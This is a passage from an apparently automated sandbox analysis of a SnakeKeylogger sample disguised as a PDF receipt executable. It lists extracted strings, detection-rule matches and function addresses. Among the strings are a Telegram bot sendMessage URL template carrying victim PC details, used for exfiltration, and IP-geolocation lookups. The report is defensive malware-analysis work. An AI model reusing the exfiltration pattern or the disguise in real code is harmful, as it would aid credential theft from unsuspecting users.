                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a
                  Source: teXfNv.exe, 0000000B.00000002.4151393860.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enh
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBkq
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, teXfNv.exe, String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, teXfNv.exe, String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, teXfNv.exe, String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, teXfNv.exe, String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, teXfNv.exe, String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: teXfNv.exe, String found in binary or memory: https://www.office.com/
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, String found in binary or memory: https://www.office.com/h
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, teXfNv.exe, String found in binary or memory: https://www.office.com/lBkq
                  Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764, version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775, version: TLS 1.2

                  System Summary

                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                  Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                  Source: initial sample, Static PE information: Filename: rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DD5886_2_067DD588
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DEA586_2_067DEA58
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DEA496_2_067DEA49
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D9A486_2_067D9A48
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DBA386_2_067DBA38
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D9A386_2_067D9A38
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DDA286_2_067DDA28
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DBA276_2_067DBA27
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DDA176_2_067DDA17
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D3AB06_2_067D3AB0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D5AA06_2_067D5AA0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D3AA06_2_067D3AA0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D7A906_2_067D7A90
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D5A906_2_067D5A90
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D7A806_2_067D7A80
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DA3686_2_067DA368
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DC3586_2_067DC358
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DA3586_2_067DA358
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DC34B6_2_067DC34B
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DF3E86_2_067DF3E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DF3D76_2_067DF3D7
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D43D06_2_067D43D0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D63C06_2_067D63C0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D43C06_2_067D43C0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D83B06_2_067D83B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D63B06_2_067D63B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D23A86_2_067D23A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D83A16_2_067D83A1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D23976_2_067D2397
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D68506_2_067D6850
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D484F6_2_067D484F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D00406_2_067D0040
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D88406_2_067D8840
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D683F6_2_067D683F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D882F6_2_067D882F
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D00076_2_067D0007
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DD0F86_2_067DD0F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DF8B06_2_067DF8B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DF8A06_2_067DF8A0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D51716_2_067D5171
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D71706_2_067D7170
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D71616_2_067D7161
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D91606_2_067D9160
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D91516_2_067D9151
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DB1186_2_067DB118
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DD1086_2_067DD108
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067DB1086_2_067DB108
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D31906_2_067D3190
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D51806_2_067D5180
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 6_2_067D31806_2_067D3180
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016025688_2_01602568
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016008718_2_01600871
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016014588_2_01601458
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016096588_2_01609658
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_01601BD08_2_01601BD0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016042288_2_01604228
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016042188_2_01604218
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0160C4A88_2_0160C4A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0160C4B88_2_0160C4B8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016013418_2_01601341
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0160331F8_2_0160331F
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016055E88_2_016055E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016055D88_2_016055D8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016054608_2_01605460
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016054518_2_01605451
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016058608_2_01605860
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_016058508_2_01605850
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D58E88_2_018D58E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D34E08_2_018D34E0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D04B08_2_018D04B0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D04C08_2_018D04C0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D0E708_2_018D0E70
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_058636A48_2_058636A4
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_058661A88_2_058661A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_058661F08_2_058661F0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_058662008_2_05866200
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08925BF88_2_08925BF8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08927B108_2_08927B10
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08920B708_2_08920B70
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08921C908_2_08921C90
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089200408_2_08920040
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089261988_2_08926198
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089212D88_2_089212D8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089272608_2_08927260
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089257B88_2_089257B8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089239648_2_08923964
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089239688_2_08923968
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08926A9F8_2_08926A9F
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08926AA08_2_08926AA0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08924BA48_2_08924BA4
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08924BA88_2_08924BA8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08925BF58_2_08925BF5
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08927B0C8_2_08927B0C
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08920B618_2_08920B61
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08921C8F8_2_08921C8F
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08924DC38_2_08924DC3
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08924DC88_2_08924DC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08925E388_2_08925E38
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_08925E408_2_08925E40
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892EE488_2_0892EE48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089280F08_2_089280F0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089280EC8_2_089280EC
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089200068_2_08920006
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892503F8_2_0892503F
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089250408_2_08925040
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089261958_2_08926195
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892F2808_2_0892F280
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089212C98_2_089212C9
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089272508_2_08927250
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089265DB8_2_089265DB
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089265E08_2_089265E0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089245138_2_08924513
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089245188_2_08924518
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892F6B88_2_0892F6B8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089257B48_2_089257B4
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089217118_2_08921711
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_089217208_2_08921720
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFA08811_2_00FFA088
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFC14711_2_00FFC147
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFD27811_2_00FFD278
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF537011_2_00FF5370
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFC46811_2_00FFC468
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFC73811_2_00FFC738
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF69A011_2_00FF69A0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFE98811_2_00FFE988
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFCA0811_2_00FFCA08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFCCD811_2_00FFCCD8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF6FC811_2_00FF6FC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFCFAA11_2_00FFCFAA
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFF63011_2_00FFF630
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF39ED11_2_00FF39ED
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF29EC11_2_00FF29EC
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFE97A11_2_00FFE97A
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF3AA111_2_00FF3AA1
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FFFA8B11_2_00FFFA8B
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_00FF3E0911_2_00FF3E09
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FA46811_2_055FA468
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FAB5011_2_055FAB50
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F9D1011_2_055F9D10
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF86811_2_055FF868
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FA45711_2_055FA457
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FA46311_2_055FA463
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FE70811_2_055FE708
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FE6F811_2_055FE6F8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FE17811_2_055FE178
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FE16811_2_055FE168
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F004011_2_055F0040
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F000611_2_055F0006
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F825811_2_055F8258
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F826811_2_055F8268
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FEFB811_2_055FEFB8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FEFA911_2_055FEFA9
